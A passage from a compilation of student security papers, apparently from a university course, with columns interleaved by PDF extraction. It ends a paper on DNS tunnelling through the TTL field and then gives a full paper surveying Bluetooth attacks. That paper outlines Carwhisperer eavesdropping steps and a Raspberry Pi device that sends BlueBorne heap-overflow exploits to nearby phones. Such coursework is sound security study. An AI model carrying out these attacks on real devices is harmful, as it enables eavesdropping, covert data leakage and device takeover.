semantic analysis ineffective in detecting such an attack. In that the modification along the way does not compromise the
situations where detection should be avoided at all costs and a low usability of the data. Therefore, it shows that the complexity
rate of transmission is tolerated, the TTL field represents a viable involved in exploiting the TTL field is relatively higher in
way to leak information or communicate covertly. comparison to resource records.

Information Bandwidth. In the context of information


6. EVALUATION bandwidth, it is apparent that resource records generally provide a
In this section, we shall perform a comparative analysis between higher bandwidth than the TTL field. At the extreme end of the
the use of the TTL field and the traditional use of resource records spectrum, resource record types such as NULL allow specification
in DNS Tunneling. The criteria employed includes exploitation of an arbitrary value (bytes) and the length of these fields can be
ease, information bandwidth, level of covertness and available sufficiently long to fill up the entire payload of a DNS packet.
defenses. Table 2 provides a summary of the analysis. Hence, after considering the overhead in the UDP and DNS
packets, up to ⅔ of the entire UDP packet can be used for
transmission. For other resource record types, the bandwidth is
lower. That is because, for resource record types such as CNAME
and TXT, the symbols are limited to digits, letters and some
commonly used symbols. On the other hand, the information
bandwidth for the TTL field is the lowest with an approximation

gp10
PDFsam_merge 82
86
of 3 bytes per resource record which is a restriction due to the 7. CONCLUSION
specification of the protocol. In this paper, we provided an analysis of how the DNS protocol
can be exploited as a covert channel to facilitate a specific attack,
Covertness. In the case of covertness, the expected covertness for DNS Tunneling. We began with a case study analysis of one of
resource records would generally be lower as compared to the the state-of-the-art tools, Iodine which we subsequently utilized to
TTL field. That is because when one encodes information in empirically examine the prevalence of the phenomenon through a
resource record types such as TXT or NULL, it is usually obvious set of experimental trials. We then explored an alternative covert
to a semantic analysis tool that the fields contain some redundant carrier for DNS Tunneling, the TTL field and detailed the
information. In contrast, the TTL field is not viewed as a carrier of implementation of our proof of concept. We concluded with a
protocol data since it is just a time specification and therefore, it is comparative analysis between the traditional use of resource
usually overlooked by most analyzers. records and the use of the TTL field as the choice of covert carrier
in DNS Tunneling. In general, we believe that there are
Defenses. In the case of defenses against DNS Tunneling, there potentially effective defenses that exist against DNS Tunneling
are 3 main streams as identified in section 4: semantic analysis, but the key factor of significance is implementation decisions in
traffic analysis and DNS blacklists/whitelists. In general, these networks. Certain implementation choices can give rise to
defenses can work against the exploitation of resource records but significant security flaws that only serve to enhance the viability
in the case of TTL field, semantic analysis could be defeated. That of an attack.
is because, semantic analysis generally targets resource records in
DNS responses and as mentioned earlier in the discussion for
covertness, the TTL field is often overlooked by most semantic 8. ACKNOWLEDGMENTS
analysis tools. On the other hand, traffic analysis and DNS We would like to express our gratitude to Prof. Hugh Anderson
blacklists/whitelists are more comprehensive defenses since they for his valuable assistance during the course of this project.
do not specifically target the contents within a DNS message. As
such, they can also work against the exploitation of the TTL field. 9. REFERENCES
[1] Couture, E. Covert Channels, 2010. Retrieved 20
In general, amongst the two defenses, traffic analysis and DNS September, 2017, from SANS Institute InfoSec
blacklists/whitelists, DNS blacklists/whitelists would be the most Reading Room: https://www.sans.org/reading
effective and sustainable defense given that the list is sufficiently room/whitepapers/detection/covert-channels-33413
comprehensive. That is because, in the case of traffic analysis, the
defense is more likely to be effective if the tunneled information is [2] DNS Architecture. Retrieved 25 October, 2017, from
significantly large (>1mB). Therefore, it might prove to be Microsoft: https://technet.microsoft.com/en-
ineffective against the leakage of small data (e.g. us/library/dd197427(v=ws.10).aspx
keys/credentials). [3] DNS Protocol. Retrieved 26 October, 2017, from Microsoft:
https://technet.microsoft.com/en-
It is also worth noting that the key factor that facilitates DNS us/library/dd197470(v=ws.10).aspx
Tunneling is actually implementation decisions for a network. The
decision of leaving port 53 unmonitored is a significant security [4] DNS QUERIES & RESOLUTION PROCESS. Retrieved 25
flaw that leaves the network defenseless against DNS Tunneling. October, 2017, from Firewall.cx:
On the hand, although effective defenses such as DNS http://www.firewall.cx/networking-topics/protocols/domain-
blacklists/whitelists exist, their effectiveness is still constrained name-system-dns/159-protocols-dns-resolution.html
once again due to implementation decisions. For instance, in the
[5] Ekman, E., Andersson, B. and Bezemer, A. Iodine. Retrieved
case of open Wi-Fi networks, this has to do largely with the
15 September, 2017, from GitHub:
complication in deploying a login system. The login system often
https://github.com/yarrick/iodine
lies on the gateway server which redirects all the outbound traffic
from not-yet-authorized clients to the login page. It is impossible [6] Farnham, G. and Atlasis, A. Detecting DNS Tunneling,
to block the traffic to the local DNS server as doing so would 2013. Retrieved 24 October, 2017, from SANS Institute
prevent the login page from being accessed by the client. The InfoSec Reading Room: https://www.sans.org/reading-
local DNS server also cannot be blocked from accessing the room/whitepapers/dns/detecting-dns-tunneling-34152
internet as doing so would cause the authorized clients to be
blocked from browsing. As such, the optimal implementation is to [7] Fokau, A. Simple DNS server (UDP and TCP) in Python
allow the DNS server and the gateway server to share an identical using dnslib.py. Retrieved 28 October, 2017, from GitHub:
authorization list and serve differently for the queries from https://gist.github.com/andreif/6069838
authorized and unauthorized clients. However, such an [8] Levine, J. DNS blacklists and whitelists (No. RFC 5782),
implementation is almost never seen because open Wi-Fi 2010.
providers usually consider DNS and gateway as two different
systems where there is no integration facilitated by the respective [9] Marchal, S. DNS and Semantic Analysis for
vendors of the systems. Once again, such an implementation Phishing Detection, 2015.
choice facilitates DNS Tunneling despite the existence of [10] Roolvink, S. Detecting attacks involving DNS
potentially effective defenses. Servers: A Netflow data based approach, 2008.

gp10
PDFsam_merge 83
87
PDFsam_merge 88
CS3235 Group 11: Hacking Bluetooth

Lim Yong Zhi Leon Overweel


National University of Singapore Delft University of Technology
limyz@u.nus.edu L.P.Overweel@student.tudelft.nl
Leow Wei Siang Lau Wen Hao
National University of Singapore National University of Singapore
a0134185@u.nus.edu l.wenhao@u.nus.edu

ABSTRACT a very lucrative protocol to crack: a good exploit to the


In this project, we explore the many security vulnerabilities Bluetooth protocol has the potential to affect hundreds of
that have been exposed by the overly complex Bluetooth millions of devices.
standard. We provide a high-level explanation of the Blue-
tooth stack, and aggregate some historical attacks such as 2. BACKGROUND
Bluejacking, Bluesmack, Bluesnarfing, Bluebugging, Helo- In this section, we provide an overview of the Bluetooth
moto, DirtyTooth, GATTack, and Blueborne. core stack (Subsection 2.1) and some historical attacks on
Bluetooth (Subsection 2.2).
We then describe some of the vulnerabilities we see are still
present in today’s Bluetooth standards, such as the complex-
ity of the specification and several spots of the protocol that 2.1 Bluetooth Core Specifications
are significantly weakened by manufacturers’ implementa- As of date, the current version of Bluetooth, version 5.0,
tions. has 2,822 pages on the Bluetooth Core Specification which
describes how to build a Bluetooth-compliant system that
We also detail our research process as well as the tools we can interact with other Bluetooth-compliant systems. [1]
used, and present our proof of concept of automatically at-
tacking Bluetooth devices using Blueborne on a Raspberry Broadly, there are two forms of Bluetooth wireless technol-
Pi 3. Finally, we suggest future work. ogy systems: Basic Rate (BR) and Low Energy (LE). Both
systems include device discovery, connection establishment
and connection mechanisms. The Basic Rate system in-
1. WHAT IS BLUETOOTH? cludes optional Enhanced Data Rate (EDR) Alternate Me-
Bluetooth wireless technology is a short-range communi- dia Access Control (MAC) and Physical (PHY) layer exten-
cations system intended to replace the cable(s) connecting sions.
portable and/or fixed electronic devices [1].
The Bluetooth core system consists of a Host and one or
The key features of Bluetooth wireless technology are ro- more Controllers. A Host is a logical entity defined as all
bustness, low power consumption, and low cost. The stan- of the layers below the non-core profiles and above the Host
dard has proliferated throughout especially the laptop and Controller Interface (HCI). A Controller is a logical entity
mobile markets: most smartphones available today, as well defined as all of the layers below HCI. An implementation
as many laptops, have Bluetooth support built in. of the Host and Controller may contain the respective parts
of the HCI.
This has created a diverse hardware ecosystem of acces-
sories: from wireless speakers and headphones, to step track- An implementation of the Bluetooth Core has only one Pri-
ers and other fitness monitoring devices, to wireless cameras. mary Controller which may be one of the following configu-
rations:
This ecosystem has been very beneficial to consumers, since
there is a lot of competition which drives prices down be-
cause of the sheer volume of different products on the mar- • A Low Energy (LE) Controller including the LE PHY,
ket. Bluetooth’s proliferation, however, also causes many Link Layer and optionally HCI.
security concerns. Because its use is so widespread, it is
• A combined BR / EDR Controller portion and LE con-
troller portion (as identified in the previous two bul-
lets) into a single Controller. This configuration has
only one Bluetooth device address shared by the com-
bination in the combined Controller.

gp11
PDFsam_merge 85
89
analysis was conducted on 427 bluejacks from Bluejackq,
an online community of bluejackers, in which the contex-
tual characteristics of bluejacking were examined. Bluejack-
ing was found to be highly location-dependent, primarily
transpiring in everyday public places. The message content
of the bluejacks was also inspired by the physical location
where bluejacking took place. with full access to call and
SMS functionality, internet connection, and many phone set-
tings.” [6]

2.2.2 Bluesmack
“BlueSmack is a Bluetooth attack that knocks out some
Figure 1: Simplified Bluetooth Stack
Bluetooth-enabled devices immediately. This Denial of Ser-
vice (DoS) attack can be conducted using standard tools
In this paper, there are two layers of the Bluetooth stack that ship with the official Linux Bluez utils package. The
which are our focus, namely the Logical Link Control and ’Ping of Death’ is basically a network ping packet that used
Adaptation Layer Protocol (L2CAP) on the first layer, the to knock out early versions of Microsoft Windows 95. The
Bluetooth Network Encapsulation Protocol (BNEP), Radio BlueSmack is the same kind of attack buit transferred in to
Frequency Communication (RFCOMM) and Service Discov- the Bluetooth world. On the L2CAP layer there is the pos-
ery Protocol (SDP) on the second layer. (Refer to Figure sibility to request an echo from another Bluetooth peer. As
1) for the ICMP ping, the idea of the L2CAP ping (echo re-
quest) is also to check connectivity and to measure roundtrip
L2CAP provides connection oriented and connectionless data time on the established link. Basically, the l2ping that ships
services to upper layer protocols with protocol multiplexing with the standard distribution of the BlueZ utils allows the
capability, segmentation and reassembly operation and is user to specify a packet length that is sent to the respective
the lowest layer in the Bluetooth stack. [1, 2] peer. This is done by meas of the -s <num> option. Many
(many) iPaqs (a Pocket PC and personal digital assistant
RFCOMM, which is encapculated by L2CAP, is serial ca- first unveiled by Compaq in April 2000) react immidiately
ble emulation protocol based on ETSI TS 07.10, giving AT beginning with a size of about 600 bytes.” [7]
commands. [1, 3]
2.2.3 Bluesnarfing
BNEP facilitates network encapsulation (usually IP based) “Bluesnarfing is the unauthorized access of information from
over Bluetooth. [1, 2] a wireless device through a Bluetooth connection, often be-
tween phones, desktops, laptops, and PDAs (personal digi-
SDP allow devices to discover what services are supported tal assistant). This allows access to calendars, contact lists,
by each other, and what parameters to use to connect to emails and text messages, and on some phones, users can
them. [1] Some examples include the Audio/Video Control copy pictures and private videos.” [8]
Transport Protocol (AVCTP) or Audio/Video Distribution
Transport Protocol (AVDTP), which provide the Advanced 2.2.4 Bluebugging
Audio Distribution Profile (A2DP) service. “Bluebugging is a form of Bluetooth attack often caused by
a lack of awareness. It was developed after the onset of blue-
However, an unnecessary complexity of Bluetooth is frag- jacking and bluesnarfing. Similar to bluesnarfing, bluebug-
mentation which has no less than 4 different layers imple- ging accesses and uses all phone features but is limited by
mented throughout the stack. The absurdity goes even fur- the transmitting power of Class 2 Bluetooth radios, normally
ther as a packet will be fragmented by the SDP continuation capping its range at 10-15 meters. However, the operational
mechanism, and then by L2CAP’s segmentation mechanism, range has been increased with the advent of directional an-
and then again by Asynchronous Connection-Less (ACL) tennas.” [9]
continuation, and one last time by the fragmentation mech-
anism done the Link Controller. [2]
2.2.5 Helomoto
The sheer complexity of the stack creates an enormous at- “The HeloMoto attack has been discovered by Adam Lau-
tack vector, which, over the years, has been exploited in rie and is a combination of the BlueSnarf attack and the
many ways. BlueBug attack. The attack is called HeloMoto, since it was
discovered on Motorola phones. The HeloMoto attack takes
advantage of the incorrect implementation of the ’trusted
2.2 Historical Bluetooth Attacks device’ handling on some Motorola devices. The attacker
In the past, Bluetooth has been attacked in many ways. We initiates a connection to the unauthenticated Object Ex-
enumerate some of them below, as listed by [4, 5]: change (OBEX) Push Profile pretending to send a vCard.
The attacker interrupts the sending process and without in-
2.2.1 Bluejacking teraction the attacker’s device is stored in the ’list of trusted
“The practice of using Bluetooth-enabled mobile phones to devices’ on the victim’s phone. With an entry in that list,
send unsolicited messages to other Bluetooth-enabled mobile the attacker is able to connect to the headset profile with-
phones within a transmission range of 10 meters. A content out authentication. Once connected to this service, the at-

gp11
PDFsam_merge 86
90
tacker is able to take control of the device by means of AT- 3. EXPLORATION
commands (as BlueBug).” [10] In this section, we cover our journey how we explored Blue-
tooth and various attempts and experimentation carried out
2.2.6 DirtyTooth to hack it.
“There is a trick or hack for iOS 10.3.3 and earlier and iOS 11
beta 4 that takes advantage of the management of the pro- 3.1 Bluetooth Vulnerabilities
files causing impact on the privacy of users who use Blue- Bluetooth may seem to provide an excellent choice to meet-
tooth technology daily. From the iOS device information ing our daily needs but its not without its problems. Blue-
leak caused by the incorrect management of profiles, a lot tooth is far from being a secure technology and its implemen-
of information about the user and their background may be tation leaves much to be improved. It has faced numerous
obtained. security issues and increasing risks to attacks despite having
security features since 2001 [5, 14].
“When the iOS system detects a Bluetooth signal, the user
can visualize the device with which it wants to connect and a Here are some vulnerabilities which affects it:
scenario like the following will be observed. The speaker that
appears in the Bluetooth discovery is announcing the A2DP
profile, a profile to play audio via the Bluetooth connection. 1. The packet headers (which are plaintext) contain enough
When the user clicks on it, the pairing is completed, with no information from which the Bluetooth MAC addresses
need for a PIN in versions Bluetooth 2.1 or higher. After a (BDADDRs) of communicating devices can be derived.
few seconds, the speaker Bluetooth can change its profile to a If a machine generates any Bluetooth traffic, an at-
Phone Book Access Profile (PBAP) profile. If this happens, tacker in physical proximity can derive its BDADDR
iOS will perform the profile change without displaying any and use it to send unicast traffic to the device. [2, 15]
type of notification to the user. 2. If the device generates no Bluetooth traffic, and is only
listening, it is still possible to ”guess” the BDADDR,
“Note the existence of a weakness or an accessibility config- by sniffing its WiFi traffic. This is viable since WiFi
uration extra in iOS. When the profile change is carried out MAC addresses appear unencrypted over the air and
without notification, the synchronization of contacts is en- due to the widely accepted norm of OEMs and hard-
abled by default, giving access to it. In other words, Dirty- ware manufacturers that the MACs of internal Blue-
Tooth is a trick or hack that can take advantage of this tooth/WiFi adapters are either the same, or only differ
accessibility configuration.” [11] in the last digit (one being +1 of the other). [2, 15]

2.2.7 GATTack 3. In Secure Simple Pairing (SSP), many manufacturers


“Bluetooth Low Energy incorporates device pairing and link- define PIN code be typically ’0000’ or ’1234’ by default.
layer encryption. However, significant amount of devices This opens up the connection to attacks as a malicious
do not implement these features. ... There devices can be party could crack the PIN code relatively easily. [5,16]
attacked in various ways - starting from simple denial of 4. The stream cipher used in Bluetooth, E0, was also
service, by spoofing, passive and active transmission inter- found to have vulnerabilities, where the original 2128
ception, up to abuse of excessive and improperly configured operations required to crack E0 was lowered to just 238
device’s services. ... The tool creates exact copy of attacked operations as of 2005. [17]
device in Bluetooth layer, and then tricks mobile application
to interpret its broadcasts and connect to it instead the orig- 5. According to Armis Labs, the Bluetooth Core Spec-
inal device. At the same time, it keeps active connection to ifications (Master Table of Contents and Compliance
the device, and forwards to it the data exchanged with mo- Requirements) has 2,822 pages vs WiFi specification
bile application. In this way, acting as ‘Man-in-the-Middle,’ (802.11) is only 450 pages. Because of its complex-
it is possible to intercept and/or modify the transmitted re- ity, Bluetooth kept researchers from auditing its im-
quests and responses.” [12] plementations at the same level of scrutiny that other
highly exposed protocols and resulted in having a large
2.2.8 BlueBorne number of vulnerabilities being reviewed. [13]
“BlueBorne is an attack vector by which hackers can lever-
age Bluetooth connections to penetrate and take complete 3.2 Process
control over targeted devices. BlueBorne affects ordinary This was our exploratory process that led to our final results.
computers, mobile phones, and the expanding realm of IoT
devices. The attack does not require the targeted device 1. We attempted to do some snooping using the Adafruit
to be paired to the attacker’s device, or even to be set on Bluetooth Low Energy sniffer. This did not yield any
discoverable mode. Armis Labs has identified eight zero- useful results since the headphones we had available
day vulnerabilities so far, which indicate the existence and (Apple AirPods) do not use this standard but rather
potential of the attack vector. Armis believes many more Apple’s W1 chip implementation of maintaining a Blue-
vulnerabilities await discovery in the various platforms us- tooth Class 1 connection.
ing Bluetooth. These vulnerabilities are fully operational,
and can be successfully exploited, as demonstrated in our re- 2. We attempted to install Blueborne on Windows 10,
search. The BlueBorne attack vector can be used to conduct but after much trial and error we were not able to
a large range of offenses, including remote code execution as get the required Python libraries compiled for and in-
well as Man-in-The-Middle attacks.” [13] stalled on Windows to get this working.

gp11
PDFsam_merge 87
91
3. We attempted to install Blueborne on the Ubuntu Sub- 4.1 Hardware
system for Windows 10, which worked; we were not, 4.1.1 Adafruit BLESniffer
however, able to snoop Bluetooth signals using this The Adafruit Bluetooth Low Energy Sniffer is capable of
technique. We suspect that this might be because the passively capturing data exchanges between two Bluetooth
Ubuntu Subsystem does not have proper access to the Low Energy devices, and push that data into Wireshark. It
laptop’s Bluetooth receiver. also adds useful descriptors to avoid having to examine the
4. We discovered that Bluetooth LE may not be applica- long Bluetooth spec. The device only works for Bluetooth
ble to devices delivering the A2DP audio. Such devices LE, not for other implementations of Bluetooth [22].
rely only on the Bluetooth Basic Rate (BR) or Classic
protocol. 4.1.2 Ubertooth One
Ubertooth One is an open source 2.4 GHz wireless develop-
5. We attempted to do some snooping on Actxa Stride+ ment platform for Bluetooth experimentation [23]. It has
Steps Tracker [18] using the Adafruit Bluetooth Low the following features [24]:
Energy sniffer. We have managed to successfully cap-
ture packets due to its ’always visible’ status and all
information between the host and step tracker was in- 1. 2.4 GHz transmit and receive.
tercepted.
2. Transmit power and receive sensitivity comparable to
However, as there is no audio involved in device, no a Class 1 Bluetooth device.
further investigation was carried out for this attempt.
3. Standard Cortex Debug Connector (10-pin 50-mil JTAG).
6. We attempted to install Blueborne in a virtualised en-
vironment using Oracle VM VirtualBox. Thanks to 4. In-System Programming (ISP) serial connector.
Kali Linux, we also discovered various tools which al-
lows us to discover vulnerabilities onto Bluetooth. 5. Expansion connector: intended for inter-Ubertooth com-
munication or other future uses.
We will cover this in detail under Section 4.2.3. All
attempts carried out after this mandates the use of a 6. Six indicator LEDs.
Bluetooth USB adapter.
7. We attempted to use Carwhisperer on a phone and 4.1.3 Nordic Semiconductor nRF51 DK
headset with limited success. The nRF51 DK is “The nRF51 DK is a low-cost, versatile
single-board development kit for BluetoothÂő low energy,
A detailed Proof-of-Concept (PoC) is covered under ANT and 2.4GHz proprietary applications [which is] com-
Section 5.1. patible with the Arduino Uno Revision 3 standard, making
8. We attempted to install Kali Linux on the Raspberry it possible to use 3rd-party shields that are compatible to
Pi 3 (RPi3). However, this ended not fruitful as the this standard with the kit” [25].
OS is not optimised for performance. We had to in-
stall Re4son-Kernel, which provided support for built- 4.1.4 Ellisys Bluetooth Explorer
in WiFi and Bluetooth. [19] The Ellisys Bluetooth Explorer is “Industry’s First and Only
All-In-One Wideband BR/EDR and Low Energy sniffer with
9. Much to our dismay, the delivery of the Blueborne ex- concurrent capture of Wi-Fi, 2.4 GHz spectrum, HCI, WCI-
ploit requires the use of a 64-bit system as pwntools, a 2, logic signals, and Audio I2S” [26].
CTF framework and exploit development library writ-
ten in Python. A 64-bit operating system is required
for it to work. [20] 4.2 Software
4.2.1 Bluez
10. We came across pi64, an experimental 64-bit OS named
pi64 is installed on the RPi3. pi64 is based on Debian
Stretch and backed by a 4.11 Linux kernel. Its first re-
lease only debuted on March 2017, based on Debian
Jessie. [21] As this is an experimental OS, support
for Bluetooth is not included and a Bluetooth USB
adapter has to be used to obtain Bluetooth function-
ality.
A detailed PoC is covered under Section 5.2.

4. TOOLS
Figure 2: l2ping performed on various BDADDRs
In this section, we list down various tools and options avail-
in Kali Linux
able which made Bluetooth exploitation possible.
The basic tools included in Bluez to manage Bluetooth in-
clude hciconfig, hcitool, sdptool, etc. In particular, hcitool
allows us to inquire about the a device’s details, such as the
device MAC address, name and class. sdptool checks for

gp11
PDFsam_merge 88
92
the services provided by the device (e.g. Handsfree Audio, We used Kali Linux to perform an attack using Carwhis-
etc). gatttool grabs specific values of a General Attribute, perer. Our target was a Samsung Galaxy S7 and our goal
or GATT characteristic as defined in the Bluetooth specifi- was to record all audio input to the target victim and save
cation. l2ping (see Figure 2) is a Bluetooth discovery tool it in a .raw output file. The steps are as follows:
which depoly pings to devices to see if it is alive.

4.2.2 Wireshark 1. Ensure the Bluetooth service is up and running.


Wireshark is the world’s foremost and widely-used network 2. Change the device class to ”Phone, Cellular”
protocol analyzer. It also has support for capturing Blue-
tooth; a set-up guide to do so is available at [27]. 3. Scan for Bluetooth devices and note down the Blue-
tooth address of the target device.
4.2.3 Kali Linux 4. Use Carwhisperer to record any audio input to the
Kali Linux is a Debian-based Linux distribution which con- target device and save it in a .raw file.
tains many tools aimed towards information security tasks.
The Linux implementation of the Bluetooth protocol stack
is Bluez, which is installed by default in Kali. However, our attempt ended up with little success as the
connection to RFCOMM channel was refused.
Here are a list of tools and their descriptions:

1. bluelog - A Bluetooth site survey tool that scans the


area to find as many discoverable devices in the area
and then logs them to a file
2. blueranger - A simple Python script that uses l2cap
pings to locate Bluetooth devices and determine their
approximate distances
3. bluesnarfer - Sends AT commands via RFCOMM to a
Bluetooth device that browses the phonebook or make
phone calls
4. btscanner - GUI-based tool scans for discoverable de-
vices within range
5. redfang - Locates hidden Bluetooth devices
6. spooftooph - Spoofs Bluetooth MAC addresses

4.2.4 Crackle
Aimed at Bluetooth LE, crackle exploits a flaw in the BLE
pairing process that allows an attacker to guess or very
quickly brute force the TK (Temporary Key). With the
TK and other data collected from the pairing process, the
STK (Short Term Key) and later the LTK (Long Term Key)
can be collected.
Figure 3: Carwhisperer running on a Bluetooth
With the STK and LTK, all communications between the headset with AT commands being sent
master and the slave can be decrypted. [28]
We also performed an attack on a recently purchased Blue-
5. PROOF OF CONCEPT tooth headset (see Figure 3), which claims to support Blue-
In this section, we cover on our attempts to attack Bluetooth tooth v4.1, directly works with Carwhisperer on RFCOMM
and the usage of available code and various tools to our channel 1 with its PIN defaulted to ’0000’ (set by the manu-
advantage. facturer) and simply allowed communication. However, the
headset unpairs itself from the host device, which we are
5.1 Carwhisperer v2.0 with Real-Time Audio unable to obtain any exchange of vocal communication be-
tween the host and the slave device (headset).
Our investigations found there were previous attempts to
eavesdrop Bluetooth headsets back in 2005, named Car-
Despite this, the headset continues to communicate with
whisperer. [29] It is aimed at manufacturers of carkits and
Carwhisperer and reports AT+BRSF and AT+VGM com-
other headless Bluetooth appliances for the possible secu-
mands at will. These commands are simply modem com-
rity threat evolving from the use of standard passkeys. A
mands. [32] This should not be the case as the microphone
real-time patch was also released to enable audio output si-
has been compromised and the adversary is still able to per-
multaneously. [30, 31]
form eavesdropping on the device.

gp11
PDFsam_merge 89
93
Even so, we are unable to decode the audio as Carwhisper Address Space Layout Randomization (ASLR) mitigation
generates raw files and requires processing. The documen- can be achieved as well. Pointers that are leaked from the
tation for Carwhisperer explicitly requires the use of the stack can be used to allow an attacker to learn the base ad-
legacy OSS (Open Sound System) as part of SoX (Sound dresses of the various sections of the Bluetooth process, and
eXchange) parameters. these can be used by an attacker to elevate one of the heap
overflow vulnerabilities to reliable code control. [2, 36, 37]
Thus, we are unable to obtain anything that is concrete from
the slave device. All attempts of using different parameters Although this experimentation leaks unintended informa-
in SoX, and emulation of the OSS in ALSA and PulseAudio tion, demonstrates the overflow and the ability of crashing
has been exhausted and proven unfruitful. the Bluetooth service, it can be elevated to a remote code
execution.
5.2 Raspberry Pi 3
We earlier mentioned the Blueborne exploit [13] and its ef- Not to mention, the RPi3 is also fully capable of deploying
fectiveness as a zero-day vulnerability. Allow us to place this Carwhisperer (See Section 5.1) or GATTack [12].
context into a popular small computing device, the RPi3.
Through this, the RPi3 serves as a powerful tool which
allows easy exploitation of Bluetooth vulnerabilities with-
out the need of a full-sized laptop computer in the outside
world.

6. CONCLUSION AND FUTURE WORK


In this paper, we have shown that Bluetooth has fallen vic-
tim to various attacks with evolving tools and techniques to
break into its security protocols.

Based on our findings, we highly recommend users to leave


Bluetooth off unless necessary. This does, though, put a
burden on users, who shouldn’t have to think about their
own security – their devices should take care of it for them.
We also recommend manufacturers to allow user’s headsets
to use to deploy a different pairing code instead of having it
Figure 4: RPi3 running on pi64 to be discoverable at all times or with a fixed default setting.

The RPi3 has evolved since its predecessors and is pow- This paper has not highlighted the dangers nor performed
ered by the Broadcom BCM2837 SoC, delivering a quad- exploitation via return-oriented programming (ROP) on An-
core ARM Cortex A53 (ARMv8) cluster. The ARM cores droid devices and could serve as an extension to future work
run at 1.2GHz, making the device about 50% faster than [38].
the Raspberry Pi 2. [33]
7. REFERENCES
Being credit-card-sized, its performance/portability is un- [1] Bluetooth Core Specification, Bluetooth SIG, Inc,
matched and can be used as an headless or walking hacking December 2016, v5.0.
device while discreetly being kept away from sight. We have [2] B. S. . G. Vishnepolsky, “Blueborne technical white
made a prototype which delivers the payload or steal in- paper,” Armis Labs, Tech. Rep., 2017.
formation to victims who have left their Bluetooth devices [3] E. T. S. Institute, “Etsi ts v7.1.0,” 1999. [Online].
which are unintentionally discoverable. Available:
http://www.etsi.org/deliver/etsi ts/101300 101399/
However, the delivery of the Blueborne exploit requires the 101369/07.01.00 60/ts 101369v070100p.pdf
use of a 64-bit system as pwntools will not compile on 32- [4] D. Browning and G. C. Kessler, “Bluetooth hacking:
bit systems. To overcome this, an experimental 64-bit OS A case study,” in Proceedings of the Conference on
named pi64 is installed on the RPi3.
Digital Forensics, Security and Law. Association of
Digital Forensics, Security and Law, 2009, p. 115.
A python script (Appendix A) is written using the pybluez
[5] J. Padgette, “Guide to bluetooth security,” NIST
and pwntools libraries to deliver a heap overflow vulnerabil-
Special Publication, vol. 800, p. 121, 2017.
ity to Android devices [34, 35] to unsuspecting victims.
[6] J. Thom-Santelli, A. Ainslie, and G. Gay, “Location,
The script exploits the the code flow that handles incoming location, location: a study of bluejacking practices,” in
BNEP control messages. CVE-2017-0781 abuses the mem- CHI’07 extended abstracts on Human factors in
cpy function call in BNEP FRAME CONTROL (A switch computing systems. ACM, 2007, pp. 2693–2698.
case for BNEP control messages), causing a buffer over- [7] A. Laurie, M. Holtmann, and M. Herfurt,
flow. [2, 35] “Bluesmack,” 2004. [Online]. Available:
https://trifinite.org/trifinite stuff bluesmack.html
With the combination of the SDP information disclosure [8] Wikipedia, “Bluesnarfing — wikipedia, the free
vulnerability (CVE-2017-0785), a complete bypass of the encyclopedia,” 2017, [Online; accessed

gp11
PDFsam_merge 90
94
9-November-2017]. [Online]. Available: [29] M. Herfurt. (2005) Carwhisperer. [Online]. Available:
https://en.wikipedia.org/w/index.php?title= https://trifinite.org/trifinite stuff carwhisperer.html
Bluesnarfing&oldid=791752785 [30] (2011) Bluetooth penetration testing framework.
[9] ——, “Bluebugging — wikipedia, the free [Online]. Available: http://bluetooth-pentest.narod.ru
encyclopedia,” 2017, [Online; accessed [31] B. Ballmann, “bluedivingng - next generation
9-November-2017]. [Online]. Available: bluetooth security tool,” 2011. [Online]. Available:
https://en.wikipedia.org/w/index.php?title= https://github.com/balle/bluediving
Bluebugging&oldid=801398150 [32] Trolltech. (2009) Modem emulator - control and
[10] A. Laurie, “Helomoto attack.” [Online]. Available: status. [Online]. Available: https://radekp.github.io/
ALDigitalLtd.https: qtmoko/api/modememulator-controlandstatus.html
//trifinite.org/trifinite stuff helomoto.html [33] (2016) Raspberry pi 3 is out now! specs, benchmarks
[11] S. Telefonica Digital Espana, “Dirtytooth.” [Online]. |& more. [Online]. Available:
Available: http://dirtytooth.com/ https://www.raspberrypi.org/magpi/
[12] S. Jasek, “Gattacking bluetooth smart devices,” raspberry-pi-3-specs-benchmarks
SecuRing, Tech. Rep., 2017. [34] K. Ojasoo, “Blueborne cve-2017-0781 android heap
[13] A. Labs, “Blueborne information from the research overflow vulnerability poc,” 2017. [Online]. Available:
team.” https://github.com/ojasookert/CVE-2017-0781
[14] K. Haataja, K. Hyppönen, S. Pasanen, and [35] M. Corporation, “Cve-2017-0781,” 2017. [Online].
P. Toivanen, Bluetooth Security Attacks: Comparative Available:
Analysis, Attacks, and Countermeasures, ser. http://www.cvedetails.com/cve/CVE-2017-0781
SpringerBriefs in Computer Science. Springer Berlin [36] ——, “Cve-2017-0785,” 2017. [Online]. Available:
Heidelberg, 2013. [Online]. Available: https: http://www.cvedetails.com/cve/CVE-2017-0785
//books.google.com.sg/books?id=gTNRnwEACAAJ [37] K. Ojasoo, “Blueborne cve-2017-0785 android
[15] T. O’Connor, Violent Python: a cookbook for hackers, information leak vulnerability poc,” 2017. [Online].
forensic analysts, penetration testers and security Available:
engineers. Newnes, 2012. https://github.com/ojasookert/CVE-2017-0785
[16] T. Baumeister, “Analysis of bluetooth protocol [38] L. Davi, A. Dmitrienko, A.-R. Sadeghi, and
security,” Ph.D. dissertation, University of M. Winandy, “Privilege escalation attacks on android,”
Wisconsin–La Crosse, 2010. in International Conference on Information Security.
[17] Y. Lu, W. Meier, and S. Vaudenay, “The conditional Springer, 2010, pp. 346–360.
correlation attack: A practical attack on bluetooth
encryption,” in Crypto, vol. 3621. Springer, 2005, pp.
97–117.
[18] Actxa, “Actxa stride+,” 2016. [Online]. Available:
http://actxa.com/sg/stride-plus/
[19] Re4son. (2017) Re4son-kernel for raspberry pi
1/2/3/zero/zero w. [Online]. Available:
https://whitedome.com.au/re4son/re4son-kernel
[20] Z. Riggle, “Pwntools does not work on 32-bit ubuntu,”
2015. [Online]. Available:
https://github.com/Gallopsled/pwntools/issues/518
[21] B. Amarni, “A 64-bit os for the raspberry pi 3,” 2016.
[Online]. Available: https://github.com/bamarni/pi64
[22] Adafruit, “Bluefruit le sniffer,” 2017. [Online].
Available: https://www.adafruit.com/product/2269
[23] G. S. Gadgets, “Ubertooth one,” 2017. [Online].
Available:
https://greatscottgadgets.com/ubertoothone/
[24] ——, “Project ubertooth - ubertooth one,” 2017.
[Online]. Available:
http://ubertooth.sourceforge.net/hardware/one/
[25] N. Semiconductors, “nrf51,” 2017. [Online]. Available:
https:
//www.nordicsemi.com/eng/Products/nRF51-DK
[26] Ellisys, “Ellisys - bluetooth explorer,” 2017. [Online].
Available: https://www.ellisys.com/products/bex400/
